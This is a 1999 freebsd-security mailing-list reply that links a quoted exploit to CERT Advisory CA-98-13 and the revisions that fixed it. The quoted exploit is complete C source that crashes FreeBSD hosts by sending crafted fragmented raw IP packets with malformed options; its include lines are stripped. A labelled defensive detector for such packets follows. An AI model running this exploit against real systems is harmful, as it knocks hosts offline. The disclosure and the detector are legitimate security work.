From: Don Lewis
Message-Id: <199905110318.UAA26058@salsa.gv.tsc.tdk.com>
Date: Mon, 10 May 1999 20:18:03 -0700
In-Reply-To: Darren Reed "freebsd mbuf crash" (May 5, 1:26am)
To: Darren Reed, freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash

I now suspect this is an exploit for the bug mentioned in CERT Advisory CA-98-13-tcp-denial-of-service. If so, this bug was fixed for FreeBSD 3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22 before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998.

This exploit's use of a large number of options in the IP header seems to be the tipoff.

On May 5, 1:26am, Darren Reed wrote:
} Subject: freebsd mbuf crash
}
} is this one (below) taken care of? perhaps a derivative of this?
}
} darren
}
} /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
}  * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
}  */
}
} #include
} #include
} #include
} #define __FAVOR_BSD
} #include
} #include
} #include
} #include
} #include
} #include
}
}
} u_long htona(char *host)
} {
}     u_long addr;
}     struct hostent *hp;
}
}     if ((addr=inet_addr(host)) == INADDR_NONE) {
}         if ((hp = gethostbyname(host)) == NULL)
}             return(-1);
}         bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
}     }
}     return(addr);
} }
}
} int main(int argc, char* argv[])
} {
}     char buf[128];
}     struct ip *iph = (struct ip *)buf;
}     u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
}     struct tcphdr *tcph = (struct tcphdr *)(buf + 60);
}     int s, i;
}     struct sockaddr_in sin;
}
}     if (argc != 2) {
}         printf("usage\n\t%s \n", argv[0]);
}         exit(1);
}     }
}     s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
}     if (s < 0) {
}         perror("socket");
}         exit(1);
}     }
}     sin.sin_family = AF_INET;
}     sin.sin_port = htons(7);
}     sin.sin_addr.s_addr = htona(argv[1]);
}     if (sin.sin_addr.s_addr == -1) {
}         printf("Error resolving %s\n", argv[1]);
}         exit(1);
}     }
}
}     bzero(buf, sizeof(buf));
}     iph->ip_hl=15;
}     iph->ip_v=4;
}     iph->ip_len=htons(124);
}     iph->ip_id= htons(getpid());
}     iph->ip_off= htons(IP_MF);
}     iph->ip_ttl = 255;
}     iph->ip_p = IPPROTO_TCP;
}     bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
}     iph->ip_src.s_addr = htona("10.2.3.4");
}     for (i = 0; i < 20;i++) {
}         ipoptions[i]=0xff;
}     }
}     ipoptions[0] = 0xff; /* Made up option */
}     ipoptions[1] = 0x1a;
}     memset((char *)&ipoptions[2], 0xff, 37);
}     ipoptions[39] = 1; /* IP_NOP */
}     tcph->th_sport = htons(5505);
}     tcph->th_dport = htons(23);
}     tcph->th_seq = htonl(0xabcde123);
}     tcph->th_ack = htonl(0x321edcba);
}     tcph->th_flags = TH_ACK | TH_PUSH;
}     tcph->th_win = htons(0x1234);
}
}     if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
}         perror("sendto");
}         exit(1);
}     }
}     if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
}         perror("sendto");
}         exit(1);
}     }
}     iph->ip_len = htons(80);
}     iph->ip_off = htons(8);
}     if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
}         perror("sendto");
}         exit(1);
}     }
}     exit(0);
} }
}
}-- End of excerpt from Darren Reed

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
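
Added example, not part of the original message and not the FreeBSD fix: a receive-side check in C for the trait Don Lewis calls the tipoff, a fragmented IPv4 datagram whose header is filled with options that do not parse. The flag names, the option allow-list and the constructed sample header are assumptions of this example.

```c
#include <stdint.h>
#include <string.h>

/* Result bits; the names are this example's own. */
enum { OPT_PRESENT = 1, OPT_FRAGMENT = 2, OPT_MALFORMED = 4, OPT_UNKNOWN = 8, PKT_INVALID = 16 };

/* Assumed allow-list: RR, Timestamp, Security, LSRR, SSRR, Router Alert. */
static int known_option(uint8_t t)
{
    return t == 7 || t == 68 || t == 130 || t == 131 || t == 137 || t == 148;
}

/* Classify the options area of one captured IPv4 header. */
unsigned check_ipv4_options(const uint8_t *p, size_t len)
{
    unsigned flags = 0;
    size_t hlen, olen, i;
    if (len < 20 || (p[0] >> 4) != 4)
        return PKT_INVALID;
    hlen = (size_t)(p[0] & 0x0f) * 4;          /* ip_hl counts 32-bit words */
    if (hlen < 20 || hlen > len)
        return PKT_INVALID;
    if ((p[6] & 0x3f) != 0 || p[7] != 0)       /* MF set or offset non-zero */
        flags |= OPT_FRAGMENT;
    if (hlen > 20)
        flags |= OPT_PRESENT;
    for (i = 20; i < hlen && p[i] != 0; i += olen) {   /* 0 = End of List */
        olen = 1;
        if (p[i] == 1)                         /* 1 = No-Operation */
            continue;
        olen = (i + 1 < hlen) ? p[i + 1] : 0;
        if (olen < 2 || i + olen > hlen)       /* length field is bogus */
            return flags | OPT_MALFORMED;
        if (!known_option(p[i]))
            flags |= OPT_UNKNOWN;
    }
    return flags;
}

/* Constructed sample: only the header bytes the quoted program sets. */
unsigned sample_flags(void)
{
    uint8_t h[60] = {0};
    memset(h + 20, 0xff, 40);                  /* options area */
    h[0] = 0x4f; h[6] = 0x20; h[21] = 0x1a; h[59] = 1;  /* v4/hl=15, MF, len, NOP */
    return check_ipv4_options(h, sizeof(h));
}

int main(void) { return sample_flags() == 15 ? 0 : 1; }
```

All four bits set together (options present, fragment, unknown type, bad length) is the combination worth alerting on; a fragment with well-formed known options sets only the first two.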